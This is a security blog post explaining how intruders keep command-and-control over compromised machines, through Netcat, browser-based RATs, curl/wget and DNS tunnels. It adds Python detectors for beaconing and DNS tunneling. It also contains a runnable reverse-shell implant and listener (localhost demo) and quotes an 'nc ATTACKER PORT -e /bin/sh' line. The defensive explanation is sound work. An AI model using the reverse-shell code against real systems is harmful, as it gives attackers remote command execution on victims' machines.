It seems everyone should be looking for Command and Control traffic from inside the network
(updated on 04/01/2016)
What does Command and Control mean?
It is the last step in the hacking cycle.
As we have pointed out in other posts, the cycle is SVAPE & C: Scan, Vulnerability Analysis, Penetrate, Exploit & Control
from other posts http://www.fixvirus.com/svapec/
Our video: http://youtu.be/51V3-pGcAzE
Picture: (the SVAPE & C cycle diagram)
Of course we are talking about the stage after the computer has been taken over (no matter how).
So now the hacker wants to control the device. How will that occur? There has to be communication back to a machine that can respond, so the thief knows another machine is ready for commands.
The C in the picture stands for “Command & Control”.
Many programs can be used to achieve the Control goal for the thief.
Of course the thief can write their own program to connect to their home base, but that takes effort, so typically they will use programs that are already available to communicate back and forth.
Programs such as Netcat do the trick very well.
In fact there is a persistent Netcat backdoor in Metasploit: http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor
The key to the Netcat control procedure is that Netcat first has to be uploaded to the machine, which is why netcat is flagged by many antivirus products.
Netcat provides a way for commands to be typed on the attacker’s machine but run on the target system (a reverse or bind shell).
Other pros of Netcat for the thief: it can listen or connect on any port number, which makes it hard for a network monitoring system to figure out what this traffic actually is.
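What that Netcat exchange looks like on the wire, as an added example that is not code from this post, from Netcat or from Metasploit. Both ends run in one process on 127.0.0.1 so it can be tried offline; the OS-assigned port, the newline-terminated one-command-per-connection framing and the use of the local shell are assumptions made for the demo, not how any particular backdoor is built. The point for the defender is in the returned "flow": the TCP connection is opened by the victim, outbound, to whatever port the attacker chose.

```python
"""Reverse-shell round trip, the pattern behind `nc ATTACKER PORT -e /bin/sh`.

Added example for this post, not code from the page, Netcat or Metasploit.
Assumptions: both ends run in one process on 127.0.0.1 (an OS-assigned port
stands in for the attacker's chosen port), one newline-terminated command per
connection, and the implant runs it with the local shell.
"""
import socket
import subprocess
import threading


def run_implant(handler_host: str, handler_port: int) -> None:
    """Victim side: dial OUT to the handler, run what arrives, send the output back.

    On the network this is an ordinary outbound TCP connection from the
    internal host, which is why it passes inbound-only firewall rules."""
    with socket.create_connection((handler_host, handler_port)) as sock:
        cmd = sock.recv(4096).decode().strip()          # the attacker's command
        done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        sock.sendall((done.stdout + done.stderr).encode())
        # closing the socket tells the handler the output is complete


def reverse_shell_exchange(cmd: str) -> dict:
    """Attacker side (the "nc -lvp PORT" listener): accept the call-back, push
    one command, collect the output. Returns what each side observed."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))                     # 0 = any free port
    listener.listen(1)
    port = listener.getsockname()[1]

    victim = threading.Thread(target=run_implant, args=("127.0.0.1", port))
    victim.start()

    conn, peer = listener.accept()                      # the victim opened this connection
    with conn:
        conn.sendall((cmd + "\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:                                # EOF: implant closed after replying
                break
            chunks.append(data)
    victim.join()
    listener.close()
    return {
        "command": cmd,
        "output": b"".join(chunks).decode(),
        "flow": {"src": peer, "dst_port": port, "initiated_by": "victim"},
    }


if __name__ == "__main__":
    print(reverse_shell_exchange("echo c2-test"))
```

Run it and the output of `echo c2-test` comes back to the listener even though the command executed on the "victim" side; swap 127.0.0.1 for a real attacker address and the only thing a network sensor inside the network sees is an internal host making an outbound connection to an odd port.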
So let’s say Netcat is somehow not working.
What else can be used?
How about Gmail drafts?
As in this article: http://www.networkworld.com/article/2840559/microsoft-subnet/stealthy-malware-uses-gmail-drafts-as-command-and-control-to-steal-data.html
The malware in that article is a RAT (Remote Administration Tool, also called a Remote Access Trojan).
Notice that the communication is carried out by Internet Explorer (which is on all Microsoft Windows machines).
Here are more pros for the thief:
- Analysis by reverse engineering is more complicated: there is no obvious evidence of malicious network behavior or socket usage, etc.
- The user does not usually notice the additional communication being carried out by the browser; the session is hidden.
- That also means port numbers give nothing away, since the traffic rides on the standard browser ports.
The Shape Security researcher could not recommend how to find this data, and here is the final sentence of the article:
“Before the malware morphed, however, and based on G Data’s analysis, it could work ‘just as well for numerous web portals such as Gmail, Outlook.com, etc. Even LinkedIn, Facebook and other social networks could be misused in this way.’”
So this method has more pros; the con is that the thief has to be good at Python, but that is not a barrier to entry for the thief.
On a Linux machine you can use curl (just a command, found on most Linux systems).
Other Linux commands such as wget can be used the same way.
And what about commands built into every Windows computer? Those can be used the same way.
What about Fabric, a Python remote execution program? http://www.fabfile.org/ The cons: it is a Python module that must first get onto the target machine, and it only runs on Unix-like machines.
The pro is that it uses SSH, an encrypted protocol.
There are many Command and Control methods for thief hackers to use to circumvent your detection methods.
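The Gmail-drafts RAT, the curl/wget loop and the Fabric approach above all hide in ordinary-looking outbound traffic, so port numbers tell you nothing. What they do have in common is machine-regular timing: the implant polls home on a schedule with near-identical requests, while a person browsing does not. Here is that check as an added example (not code from this post or from any product), run over a constructed web-proxy log of "epoch client destination bytes_sent" lines made up for the demo; the log format, the thresholds and the host names are assumptions.

```python
"""Beacon detection over web-proxy logs.

Added example for this post, not code from the page or from any product.
Constructed input (made up for the demo): "epoch client destination bytes" lines.
A RAT polling Gmail drafts, or a curl/wget loop fetching commands, talks to the
same host at a fixed interval with near-identical request sizes; a person
browsing does neither. CV = stdev/mean: near 0 is machine-regular, near 1 is human.
"""
import statistics
from collections import defaultdict

# Constructed sample: 10.0.0.5 polls mail.google.com every ~60 s with ~810 bytes
# (beacon); 10.0.0.7 browses a news site irregularly; 10.0.0.9 checks for
# updates twice (too few hits to judge).
SAMPLE_PROXY_LOG = """\
1459500000 10.0.0.5 mail.google.com 812
1459500003 10.0.0.7 news.example.com 5120
1459500011 10.0.0.7 news.example.com 1870
1459500060 10.0.0.5 mail.google.com 810
1459500119 10.0.0.5 mail.google.com 815
1459500180 10.0.0.5 mail.google.com 811
1459500240 10.0.0.5 mail.google.com 812
1459500301 10.0.0.5 mail.google.com 809
1459500360 10.0.0.5 mail.google.com 813
1459500420 10.0.0.5 mail.google.com 812
1459500500 10.0.0.9 update.example.org 640
1459500950 10.0.0.7 news.example.com 240
1459501400 10.0.0.7 news.example.com 4300
1459501402 10.0.0.7 news.example.com 990
1459503300 10.0.0.7 news.example.com 12000
1459503305 10.0.0.7 news.example.com 300
1459504000 10.0.0.7 news.example.com 2200
1459504100 10.0.0.9 update.example.org 640
"""


def parse_proxy_log(text: str) -> list:
    """Turn 'epoch client dest bytes' lines into (epoch, client, dest, bytes) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, dest, nbytes = line.split()
        records.append((int(ts), client, dest, int(nbytes)))
    return records


def find_beacons(records, min_hits=6, max_interval_cv=0.15, max_size_cv=0.2) -> list:
    """Group by (client, destination); flag flows whose inter-request intervals
    AND request sizes are both nearly constant. Thresholds are demo assumptions."""
    flows = defaultdict(list)
    for ts, client, dest, nbytes in records:
        flows[(client, dest)].append((ts, nbytes))

    hits = []
    for (client, dest), events in flows.items():
        if len(events) < min_hits:          # not enough samples to call it periodic
            continue
        events.sort()
        intervals = [b[0] - a[0] for a, b in zip(events, events[1:])]
        sizes = [n for _, n in events]
        mean_int, mean_size = statistics.mean(intervals), statistics.mean(sizes)
        if mean_int == 0 or mean_size == 0:
            continue
        int_cv = statistics.pstdev(intervals) / mean_int
        size_cv = statistics.pstdev(sizes) / mean_size
        if int_cv <= max_interval_cv and size_cv <= max_size_cv:
            hits.append({
                "client": client, "dest": dest, "hits": len(events),
                "mean_interval_s": mean_int,
                "interval_cv": round(int_cv, 3), "size_cv": round(size_cv, 3),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print("possible beacon:", hit)
```

On the sample only the 10.0.0.5 to mail.google.com flow is reported; the destination is a legitimate site, which is exactly the point of the drafts technique, so the alert is a lead for a person to confirm (which process on 10.0.0.5 owns those connections?), not proof on its own. Real implants add random jitter, so in practice you widen the CV threshold and look at longer windows.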
(Added for 04/01/2016)
For 2016, how about the Holiday Hack Challenge by SANS? https://holidayhackchallenge.com/
Why evaluate a CTF (capture the flag) event? Because the best writeups give a good explanation of how hackers can penetrate your network.
In that challenge the command and control runs over DNS traffic, so the hacker can stay under the radar and you will not know about the attack, and the files being transferred back into your network are .jpg files which may actually have messages hidden inside them.
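DNS is allowed out of nearly every network, which is what makes it attractive as a C&C channel: commands and stolen data travel as the labels of lookups for a domain the attacker controls. The giveaway is the shape of the names, not the port. As an added example (not code from this post, from SANS or from the challenge), here is a detector run over a constructed DNS query log of "epoch client qtype qname" lines made up for the demo; the log format, the thresholds, the two-label approximation of the registered domain and the example.net tunnel domain are all assumptions. The two googlevideo.com names are included on purpose: CDN host names also look random, which is why the check also requires many distinct subdomains before it flags a domain. The .jpg steganography side of the challenge is not covered here.

```python
"""DNS tunnel indicators over a query log.

Added example for this post, not code from the page, from SANS or from the
Holiday Hack Challenge. Constructed input (made up for the demo):
"epoch client qtype qname" lines. A tunnel shows up as a domain receiving
many distinct, long, high-entropy subdomains (often TXT lookups), because
every label carries smuggled data.
"""
import math
from collections import defaultdict

# Constructed sample: ordinary lookups from 10.0.0.5 (two CDN names with
# random-looking labels included as a near miss) and six tunnel queries from
# 10.0.0.8, each carrying 32 hex characters under c2.example.net.
SAMPLE_DNS_LOG = """\
1451606400 10.0.0.5 A www.example.com
1451606401 10.0.0.5 A mail.google.com
1451606402 10.0.0.5 A accounts.google.com
1451606403 10.0.0.5 A r3---sn-a5mekn7l.googlevideo.com
1451606404 10.0.0.5 A r5---sn-a5mekn7l.googlevideo.com
1451606405 10.0.0.5 A images.example.com
1451606410 10.0.0.8 TXT a7f30c1e9b2d56843e8b1d0a9f6c2745.c2.example.net
1451606412 10.0.0.8 TXT 5c9e1a3f7d0b28469b6d0f3a2c8e5174.c2.example.net
1451606414 10.0.0.8 TXT e2b8d4f6a0c139571f7a3c9e5b0d2846.c2.example.net
1451606416 10.0.0.8 TXT d0a6f2c8e4b193758c2e6a0f4d1b9753.c2.example.net
1451606418 10.0.0.8 TXT 3b7f1d9a5e0c28466e0c8a2f4b9d1735.c2.example.net
1451606420 10.0.0.8 TXT f1e3d5c7b9a802460a2c4e6f8b1d3579.c2.example.net
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 'www' is 0, 32 random hex characters approach 4."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Assumption for the demo: the last two labels. A real deployment would
    use a public-suffix list so that host.example.co.uk groups correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def dns_tunnel_stats(log_text: str) -> dict:
    """Per registered domain: distinct names, mean leftmost-label entropy,
    mean query-name length and the share of TXT lookups."""
    acc = defaultdict(lambda: {"names": set(), "ent": [], "len": [], "txt": 0, "n": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qtype, qname = line.split()
        d = acc[registered_domain(qname)]
        d["n"] += 1
        d["names"].add(qname.lower())
        d["ent"].append(shannon_entropy(qname.split(".")[0]))   # leftmost label
        d["len"].append(len(qname))
        if qtype.upper() == "TXT":
            d["txt"] += 1
    return {
        dom: {
            "queries": d["n"],
            "unique_subdomains": len(d["names"]),
            "mean_entropy": sum(d["ent"]) / d["n"],
            "mean_qname_len": sum(d["len"]) / d["n"],
            "txt_ratio": d["txt"] / d["n"],
        }
        for dom, d in acc.items()
    }


def flag_tunnels(stats: dict, min_unique=5, min_entropy=3.5) -> list:
    """Flag domains with many distinct names whose labels look like encoded data.
    Both conditions together: entropy alone would also catch CDN host names."""
    return sorted(dom for dom, m in stats.items()
                  if m["unique_subdomains"] >= min_unique and m["mean_entropy"] >= min_entropy)


if __name__ == "__main__":
    stats = dns_tunnel_stats(SAMPLE_DNS_LOG)
    for dom in flag_tunnels(stats):
        print("possible DNS tunnel:", dom, stats[dom])
```

On the sample only example.net is flagged; googlevideo.com has label entropy above the threshold but only two distinct names, so it is left alone. Point this at your resolver logs (or a passive DNS feed) and add a whitelist for the CDNs you know, then treat each flagged domain as something to look up with whois and your threat intelligence before blocking it.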
How can we prevent C&C traffic? It is very difficult.
Contact Us to review your options